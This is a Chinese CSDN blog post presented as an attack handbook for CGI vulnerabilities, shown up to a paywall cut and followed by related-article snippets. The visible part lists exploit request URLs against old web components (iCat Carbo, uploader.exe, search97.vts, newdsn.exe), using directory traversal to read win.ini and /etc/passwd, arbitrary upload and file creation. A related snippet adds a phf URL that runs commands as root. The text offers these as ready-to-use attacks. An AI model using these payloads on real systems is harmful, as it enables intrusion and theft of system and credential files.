漏洞扫描器CGI漏洞攻击手册

最新推荐文章于 2024-06-24 19:51:59 发布
最新推荐文章于 2024-06-24 19:51:59 发布
阅读量2.4k 收藏 1
点赞数
分类专栏: 黑客技术 文章标签: cgi iis 服务器 sybase web服务 server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yacsha/article/details/1561298
版权
本文详细介绍了针对CGI漏洞的各种攻击手段,包括利用iCat Carbo Server、uploader.exe、search97.vts、newdsn.exe等工具进行文件查看、上传和DoS攻击。同时,还提到了shtml.dll、shtml.exe等组件的漏洞,以及如何通过queryhit.htm、点点攻击等方式获取敏感信息。这些攻击方法揭示了服务器,尤其是IIS和Unix系统中的安全风险。
摘要由CSDN通过智能技术生成

1.carbo.dll
iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).
攻击方法:

提交这样的http请求 :
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog

http会做如下回应:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]

Error: (-1007) cannot open file 'C:/web/carbohome/file_to_view.htm'

查看win.ini文件: c:/winnt/win.ini:

http://host/carbo.dll?icatcommand=../../winnt/win.ini&catalogname=catalog
____________________________________________________________________________________

2.uploader.exe
如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
攻击方法: http://host/cgi-win/uploader.exe
会带你到上传页面,剩下的事就不用我告诉你了把?:)
____________________________________________________________________________________

3.search97.vts
这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。
攻击方法: http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
____________________________________________________________________________________

4.newdsn.exe
个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。
攻击方法:
1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+mi

最低0.47元/天 解锁文章
yacsha
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞扫描
weixin_45380284的博客
03-05 4389
漏洞扫描原理及工具 1.扫描原理 ping检测: 通过ping返回的TTL值大致的了解一些信息 128:xp、2000、2003 64:7、2008、Linux 255:交换机、路由等 此方法式只能大致判断,并不准确。 端口扫描 telnet IP 端口 由此可判断操作系统、软件服务类型、版本等 如:目标系统开放了137、139、445,端口可以判断目标系统为Windows系统 目标系统开放了22这样的端口很可能为Linux系统 os探测: 弱口令探测 漏洞评估 2.扫描分类: 开放扫描:TCP全连接,反
一次成功的cgi漏洞入侵
04-19
网站安全包括许多方面,尽管网管们千方百计的防范于未然,可有时还是难免疏漏。 我的“再谈cgi漏洞攻击”一文中,我利用cgi漏洞攻进几台服务器,这次我将以一次,从发现漏洞到利用漏洞, 从而攻进主机的全过程来讲解,与大家交流。
TWWWSCAN漏洞扫描CGI漏洞攻击手册
wyd018fw
01-17 713
TWWWSCAN漏洞扫描CGI漏洞攻击手册 2011年07月13日   1.carbo.dll   iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).   攻击方法: ...
PHP-CGI远程代码执行漏洞分析
最新发布
qq_64395221的博客
06-24 709
在远古的时候,web应用的运行方式很简单,web容接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork出一个子进程(解释)去执行这个文件,然后拿到执行结果,直接返回给用户,同时这个解释子进程也就结束了。sapi在PHP中的作用,类似于一个消息的“传递者”,比如我在Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写一文中介绍的fpm,他的作用就是接受Web容通过fastcgi协议封装好的数据,并交给PHP解释执行。的方式,也能传入参数。
linux c 编程之四 way-board.cgi 漏洞扫描
ncnynl的专栏
09-07 3552
linux c 编程之四 way-board.cgi 漏洞扫描一思路:前天玩了way-board.cgi这个漏洞,很不错。这个漏洞的说明:Way-board.cgi泄露系统文件漏洞,利用它可以容易得到主机的passwd及其他有相应权限的文件.具体手工利用一:利用www.google.com的搜索,搜索关键词“way-board.cgi”会得到很多的网址如:targetip/way-boa
php cgi漏洞,CGI漏洞攻击合集上
weixin_42515739的博客
03-13 1840
Filename: README.patch.3018Algorithm #1 (sum -r): 37955 11 README.patch.3018Algorithm #2 (sum): 15455 11 README.patch.3018MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69Filename: patchSG0003018Algo20. ...
从零开始学编程之三利用Winsock控件编写CGI漏洞扫描
09-30
从零开始学编程之三利用Winsock控件编写CGI漏洞扫描
x-scan扫描使用教程
10-09
### x-scan扫描使用教程知识点详解 #### 一、x-scan简介 - **定义与特点**:x-scan是一款国内知名的网络安全扫描工具,由安全焦点开发,完全免费且无需注册,支持Windows 9x/NT4/2000等多个版本的操作系统。 - **...
漏洞挖掘与工具
代码审计
04-09 4377
一、漏洞挖掘 1. 安全的木桶理论 找到最薄弱的那个点; 有一个漏洞的站点,很可能还会有更多的漏洞 开发人员的安全意识问题; 存在于一个站点的漏洞,还可能存在于其他站点 业务的代码复用; 通用型漏洞(wordpress插件漏洞,Discuz 更新不及时); 修复了的漏洞不一定就全部修复完整了 指哪修哪; 绕过修复; 学会找扫描扫不到/其他白帽子难发现的漏洞 需要深度交互/认证; 存储XSS/CSRF/越权/逻辑漏洞; 挖掘漏洞的过程 通常需要先找到危险函数,然后回溯函数的调用过程,最终
文件上传漏洞利用
m0_61506558的博客
10-09 1512
基于靶场的练习,决定把文件上传漏洞再进行总结,整体可以分为中间件解析漏洞、CMS漏洞、编辑漏洞、CVE漏洞和其他,由于本人水平有限,如有问题,请师傅留言,一起进步!!!(一)基本介绍不理解漏洞原理的,可以看看下面文章哈文件上传漏洞__Cyber的博客-CSDN博客_常见的文件上传漏洞(二)利用思路对文件上传类型进行区分,是属于编辑文件上传,还是属于第三方应用,还是会员中心。要确保文件上传是什么类型,就用什么类型方法对它进行后期的测试。
CGI安全漏洞资料速查 v1.0(三)
03-04
CGI安全漏洞的存在对Web服务形成了许多潜在的威胁,基于CGI的工作原理,从漏洞成因的角度对CGI的安全漏洞进行了分类,发现CGI漏洞的有效方法是通过安全漏洞检测。本文总结了CGI安全漏洞的资料,供读者查阅。
CGI扫描.rar
09-29
CGI扫描.rarCGI扫描.rarCGI扫描.rarCGI扫描.rar
php cgi漏洞利用工具 源代码
01-22
cgi mod(cve-2012-1823)最新漏洞,可以批量扫描多网段漏洞,多加利用,可以获取服务器控制权限。
端口和CGI扫描实现
红杉树(ecitnet)的博客
10-17 1246
 端口和CGI扫描实现WriteBy: LionD8email:   liond8@eyou.comWebsite: http://liond8.126.com 一. DIY一个端口扫描之-高级技术端口的扫描技术到现在大致分为两种,一种就是低级传统的扫描,还有就是高级技术的。今天我们就来讲讲高级技术的原理及其实现在基本代码。    经过测试我们知道正在LI
CGI程序与ShellShock漏洞
a1_pha的博客
02-27 1766
具体来说,当 Web 服务器使用 CGI 来处理用户的请求时,服务器会将请求中的各种信息(如请求头、参数等)转换为环境变量,并将这些变量传递给 CGI 脚本。由于 Shellshock 漏洞攻击者可以构造特定的HTTP请求,向服务器发送恶意的环境变量,利用 Bash 的漏洞来执行任意代码,从而获取服务器的控制权或者执行其他恶意操作。虽然该漏洞最初是在 Bash shell 中发现的,但其在 Web 服务器中的利用主要是通过 CGI 来实现的。中的一个安全漏洞,首次于2014年9月24日公开。
CGI 安全漏洞资料速查
li1213的专栏
06-06 1823
CGI 安全漏洞资料速查类型:攻击型 名字:phf 风险等级:中 描述:在 NCSA 或者 Apache(1.1.1版本以内)非商业版本的 WebServer 中    有一段程序 util.c,允许黑客以 root 身份执行任何一个指令:       http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here 建议:无
CGI漏洞速查三
|独自望海。。。
09-28 1412
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。解决方法:建议升级该cgi程序,或者删除该文件。 28. whois.cgi 描述:在多个WebServer中带有的Whois.cgi存在溢出漏洞。它们包 括: Whois Internic Lookup - version: 1.02 CC Whois - Version: 1.0 Matt?s Whois -
PHP反序列化漏洞CGI远程代码执行漏洞
LCW991207的博客
08-17 575
CVE-2012-1823就是php-cgi这个sapi出现的漏洞,本漏洞只出现在以cgi模式运行的php中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值